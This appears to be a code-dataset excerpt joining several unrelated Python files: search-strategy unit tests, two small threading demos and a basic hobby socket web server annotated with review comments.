    evolution = strategy.RegularizedEvolution(population_size=5, sample_size=3, cycles=10, mutation_prob=0.5, on_failure='ignore')
    engine = MockExecutionEngine(failure_prob=0.2)
    _reset_execution_engine(engine)
    evolution.run(*_get_model_and_mutators())
    wait_models(*engine.models)
    _reset_execution_engine()

    # on_failure='worst': failed trials are kept, with a higher failure rate.
    evolution = strategy.RegularizedEvolution(population_size=5, sample_size=3, cycles=10, mutation_prob=0.5, on_failure='worst')
    engine = MockExecutionEngine(failure_prob=0.4)
    _reset_execution_engine(engine)
    evolution.run(*_get_model_and_mutators())
    wait_models(*engine.models)
    _reset_execution_engine()
@pytest.mark.skipif(sys.platform in ('win32', 'darwin'), reason='Does not run on Windows and MacOS')
def test_rl():
    """Policy-based RL strategy: asynchronous (default) then synchronous."""
    rl = strategy.PolicyBasedRL(max_collect=2, trial_per_collect=10)
    engine = MockExecutionEngine(failure_prob=0.2)
    _reset_execution_engine(engine)
    # diff_size=True gives fc2 a third candidate (uneven search space).
    rl.run(*_get_model_and_mutators(diff_size=True))
    wait_models(*engine.models)
    _reset_execution_engine()

    rl = strategy.PolicyBasedRL(max_collect=2, trial_per_collect=10, asynchronous=False)
    engine = MockExecutionEngine(failure_prob=0.2)
    _reset_execution_engine(engine)
    rl.run(*_get_model_and_mutators())
    wait_models(*engine.models)
    _reset_execution_engine()
if __name__ == '__main__':
    # Allow running the strategy tests directly, without pytest.
    test_grid_search()
    test_random_search()
    test_evolution()
    test_rl()
|
hilo2.py | import threading
def worker(count):
    """Print a short (Spanish) message identifying this unit of work."""
    print('Este es el %s trabajo que hago hoy' % count)


# Spawn three worker threads, keeping a handle to each one.
threads = []
for job_id in range(3):
    thread = threading.Thread(target=worker, args=(job_id,))
    threads.append(thread)
    thread.start()
testweb.py | '''
Zed webserver
Very basic model of working Webserver
@name Zed
@author ZaKlaus
@version 1.0
@imports socket,re,os
@license MIT
'''
import socket as bs
import re
import os.path
import os
from threading import Thread
class Network:
    """Thin wrapper around a listening TCP socket.

    On connection-level errors the server socket is re-created via
    ``Listen`` so the server keeps running.

    Fixes vs. original: the socket is stored consistently on the instance
    (the original mixed a ``Network.sock`` class attribute with
    ``self.sock``, so two instances would clobber each other), and
    ``Accept`` catches ``OSError`` instead of a bare ``except:`` that also
    swallowed KeyboardInterrupt/SystemExit.
    """

    def __init__(self, host, port, conn):
        self.host = host
        self.port = port
        self.conn = conn  # listen() backlog size

    def Listen(self):
        """(Re)create the listening socket and start accepting."""
        self.sock = bs.socket()
        self.sock.bind((self.host, self.port))
        self.sock.listen(self.conn)

    def Receive(self, client, size):
        """Read up to *size* bytes from *client*; returns None after a reset."""
        try:
            return client.recv(size)
        except ConnectionResetError:
            self.Listen()

    def Send(self, client, buf):
        """Send *buf* to *client*; restarts listening if the peer reset."""
        try:
            client.send(buf)
        except ConnectionResetError:
            self.Listen()

    def Accept(self):
        """Accept one connection; returns (client, address) or None on error."""
        try:
            return self.sock.accept()
        except OSError:
            # Socket-level failure (e.g. socket was closed): re-listen.
            self.Listen()
            return None

    def Close(self):
        self.sock.close()
class System:
    """Web-server core: loads the MIME map, owns the Network, serves files.

    The constructor has side effects: it reads ``mime.txt`` from the current
    working directory and immediately binds/listens on the given port.
    """

    def __init__(self, pagedir, slash, network):
        # Pages are served from <cwd>/<pagedir>/; *slash* is the path
        # separator ('\\' on Windows in the caller below).
        self.basedir = os.getcwd() + slash
        self.pagedir = self.basedir + pagedir + slash
        self.network = Network(network[0], network[1], network[2])
        self.mimemap = []
        print ("Zed Webserver -- 0.0.1")
        print ("Building MIME map...")
        # mime.txt format: ".ext mime/type" per line; the leading dot is
        # stripped when building the [extension, mime-type] pairs.
        mimelist = open(self.basedir + "mime.txt", 'r', encoding="utf-8").read()
        for x in mimelist.splitlines():
            try:
                self.mimemap.append([x.split(" ")[0][1:], x.split(" ")[1]])
            except IndexError:
                # Skip blank or malformed lines.
                pass
        print ("MIME map's been built!")
        self.network.Listen()
        print ("Server is listening at %s:%d" %(self.network.host, self.network.port))

    def SetDomain(self, domain):
        self.domain = domain

    def GetDomain(self):
        return self.domain

    def LoadFile(self, filename):
        """Read a page file, falling back to binary mode for non-UTF-8 data.

        Sets ``self.binarystate`` so the response builder knows whether the
        payload is text (str) or raw bytes.
        """
        print('File request: ', self.pagedir + filename)
        try:
            f = open(self.pagedir + filename,'r', encoding="utf-8")
            out = f.read()
            self.binarystate = False
        except:
            f = open(self.pagedir + filename,'rb')
            out = f.read()
            self.binarystate = True
        f.close()
        return out

    def GetMIME(self, ext):
        # Linear scan of the MIME map; "null" signals an unknown extension.
        ext = ext
        for x in range(len(self.mimemap)):
            if self.mimemap[x][0] == ext:
                return self.mimemap[x][1]
        return "null"

    def Tick_safe(self, client, address):
        # Handles a single client; runs on its own thread (see Tick).
        print ("Incoming connection: ", address)
        request = Request(self, self.network.Receive(client, 1024))
        self.network.Send(client, request.send)
        # NOTE(review): this closes the *listening* socket, not the client
        # connection (probably meant client.close()); the server survives
        # only because Accept() re-Listens after the resulting error.
        self.network.Close()

    def Tick(self):
        try:
            client, address = self.network.Accept()
        except:
            # Accept() returns None after an error; the unpacking then fails.
            return
        thread = Thread(target=self.Tick_safe, args=(client, address))
        thread.start()
class Request:
    """Parses one raw HTTP request and builds the response bytes in ``self.send``."""

    def __init__(self, system, data):
        self.system = system
        self.Proceed(data)

    def BuildList(self):
        # No index.html present: render a simple directory listing instead.
        data = os.listdir(self.system.pagedir)
        text = "<html><head><title>Files</title></head><body>Files:\n"
        for a in data:
            text += '<li><a href="http://'+self.domain+str(self.system.network.port)+'/'+a+'">'+a+'</a>' + '</li>'
        text += "</body></html>"
        return text

    def GenerateResponse(self, params):
        # params = (Content-Length header line or "", content type)
        return "HTTP/1.1 200 OK\nServer: Zed Webserver\n%sConnection: keep-alive\nContent-Type: %s\n\n" % (params[0], params[1]);

    def Identify(self, var, op):
        """op 's': build a Content-Length header for payload *var*;
        op 't': map extension *var* to its MIME type ('text/html' if unknown)."""
        if op == 's':
            print ("Content-Length: %d" % len(var))
            return "Content-Length: %d\n" % len(var)
        elif op == 't':
            try:
                mime = self.system.GetMIME(var)
                if mime == "null":
                    raise ValueError
                print ("Content-Type: %s" % mime)
                return mime
            except ValueError:
                print ("Unknown MIME type! Extension: %s" % var)
                return "text/html"

    def Proceed(self, data):
        # NOTE(review): original indentation was lost; the nesting below is
        # reconstructed from the control flow -- confirm against history.
        try:
            # Extract the Host header, with and without an explicit port.
            try:
                self.domain = re.search('Host: (\S+):',data.decode(),re.DOTALL).group(0)[6:]
            except:
                try:
                    self.domain = re.search('Host: (\S+)\r\nD',data.decode(),re.DOTALL).group(0)[6:-5]
                except:
                    # Unparseable request: restart the listener and give up.
                    self.system.network.Listen()
                    return
            # Requested path must look like "/name.ext"; "/1.1" means the
            # regex matched the HTTP version instead of a real path.
            self.get = re.search('/(\S+\.\S+)\s',data.decode(),re.DOTALL).group(0)
            print ("GET '%s' FROM '%s'" % (self.get, self.domain))
            if self.get.startswith("/1.1"):
                raise ValueError
        except:
            # No usable URL: serve index.html, or a generated file listing.
            print('No URL specified! Assuming index.html')
            if not os.path.isfile(self.system.pagedir + 'index.html'):
                print('index.html not found! Generating file tree...')
                self.data = self.BuildList()
                self.response = self.GenerateResponse(("", "text/html"))
                self.send = ("%s%s" % (self.response, self.data)).encode()
                return
            else:
                self.data = self.system.LoadFile('index.html')
                self.response = self.GenerateResponse(("", "text/html"))
                self.send = ("%s%s" % (self.response, self.data)).encode()
                return
        if not os.path.isfile(self.system.pagedir + self.get):
            # Unknown path: serve the 404 page.
            self.data = self.system.LoadFile('404.html')
            self.response = self.GenerateResponse(("", "text/html"))
            self.send = ("%s%s" % (self.response, self.data)).encode()
            return
        else:
            self.data = self.system.LoadFile(self.get)
            # Extension from the path, minus the trailing whitespace the
            # regex captured.
            self.extension = self.get.split(".")[1][:-1]
            if self.system.binarystate:
                # Binary payloads are sent raw, with no header block.
                self.response = ""
                self.send = self.data
            else:
                self.response = self.GenerateResponse((self.Identify(self.data, 's'), self.Identify(self.extension, 't')))
                self.send = ("%s%s" % (self.response, self.data)).encode()
# Serve ./page on port 7777 (Windows-style '\\' path separator), accepting
# up to 128 queued connections, forever.
main = System("page", '\\', ("", 7777, 128))
while True:
    main.Tick()
|
joining.py | import time
from threading import Thread
def print_and_sleep(number):
    """Print 0..number-1, pausing one second before printing each value."""
    counter = 0
    while counter < number:
        time.sleep(1)
        print(counter)
        counter += 1
# args must be a tuple so each Thread gets its own call for parallelism
thread_1 = Thread(target=print_and_sleep, args=(10,))
thread_2 = Thread(target=print_and_sleep, args=(10,))

# Joining right after each start serializes the threads: the second one
# does not begin until the first has finished.
started_at = time.time()
for current in (thread_1, thread_2):
    current.start()
    current.join()
finished_at = time.time()

# Roughly 20 seconds total (2 threads x 10 one-second sleeps)
print(finished_at - started_at)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.